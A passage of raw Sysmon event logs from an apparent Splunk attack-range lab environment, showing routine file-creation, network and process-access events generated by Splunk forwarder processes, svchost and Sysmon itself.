Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286714Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:47.382{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F53B42605CB4AF2A835931239ECF2742,SHA256=2A2B19F1F5BBBC0301277182D6DE83B1736B2DB4983288D7079C63FA76744DB0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215613Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:45.636{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51269-false10.0.1.12-8000- 23542300x8000000000000000215612Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:48.683{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC2A3C83D5D4FDCC5BD6BC10E68D05A7,SHA256=335E933A5AE1D8F067A48B40D34CBE98641A36F57ECF3368E811D7C79740779A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286718Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:48.523{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A36F51213B4150909EC585ABB87ACEA4,SHA256=338FC15502A86C2512F661DE700A288E932594A25D00CC3DAA204DFE3D73C21C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215611Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:48.400{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5278660360CD7626E893FF5B05F79AB7,SHA256=EF302B8CFEC03A119F4684BA7A5E3EB533F12849ACD00FD981325739CD66A86E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215610Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:48.072{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1020-6216-3004-000000003902}2908C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215609Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:48.072{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215608Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:48.072{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215607Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:48.072{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215606Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:48.072{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215605Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:48.072{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215604Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:48.072{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215603Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:48.072{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215602Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:48.072{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215601Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:48.072{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215600Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:48.072{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1020-6216-3004-000000003902}2908C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215599Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:48.072{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1020-6216-3004-000000003902}2908C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215598Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:48.073{4F8D34B0-1020-6216-3004-000000003902}2908C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286719Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:49.554{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EFBC8A7FBC57D49BE907B6B699FB5D8,SHA256=2D186D0DE2B29E7C546C40E8567EF1508F3A70C82485DCDB271FDE0AC1317EC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215629Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:49.714{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63C575C9D42F94CDF75A16A279FF4E70,SHA256=055EB56A91A1A7FB5693254F38B1E91C950B28D053D57911BB2C5303820FBAAA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215628Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:49.542{4F8D34B0-1021-6216-3104-000000003902}39522904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215627Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:49.339{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1021-6216-3104-000000003902}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215626Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:49.339{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215625Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:49.339{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215624Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:49.339{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215623Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:49.339{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215622Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:49.339{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215621Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:49.339{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215620Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:49.339{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215619Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 